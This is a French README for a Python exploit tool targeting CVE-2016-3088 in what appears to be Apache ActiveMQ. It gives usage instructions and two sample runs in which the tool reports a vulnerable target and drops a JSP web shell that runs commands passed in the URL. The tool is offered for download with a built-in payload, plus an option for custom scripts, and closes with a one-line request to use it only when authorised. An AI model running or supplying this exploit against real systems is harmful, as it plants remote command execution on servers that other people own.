
Un script d'exploitation basé sur Python pour CVE-2016-3088
Un script d'exploitation basé sur Python pour CVE-2016-3088.
C'est mon premier script, donc il se peut que quelque chose ne soit pas tout à fait adapté.
Mais il semble bien fonctionner lorsque je l'ai testé.
Ce script élimine la nécessité de capturer des paquets lors de la pénétration de CVE-2016-3088,
afin que nous puissions écrire et déplacer le fichier directement.
python CVE-2016-3088.py --url http://ip:port/ [--path absolute_path] [--script filename.txt]
le paramètre --script est optionnel, le programme utilisera la charge utile intégrée si vous l'exécutez sans lui,
la charge utile ne permet d'exécuter que quelques commandes dans l'URL.
Mais vous pouvez entrer d'autres scripts pour atteindre votre objectif.
Téléchargez simplement le fichier .py .
Et il nécessite certains modules.
$ python CVE-2016-3088.py --url http://192.168.244.153:8161/ --path /opt/activemq
[+] The target is Vulnerable
[+] Exploiting...
[+] Successful!
[+] Visit The JSP file: http://192.168.244.153:8161/admin/d404ca6ffa5849a9ab1202dd388684f5.jsp?pwd=023&i=[Your-Command]
$ python CVE-2016-3088.py --url http://192.168.244.153:8161/ --path /opt/activemq --script script.txt
[+] The target is Vulnerable
[+] Exploiting...
[+] Successful!
[+] Visit The JSP file: http://192.168.244.153:8161/admin/6655d82d47cd43bb8a21515f476bce1f.jsp
Veuillez utiliser cet outil avec précaution et uniquement lorsque vous êtes autorisé !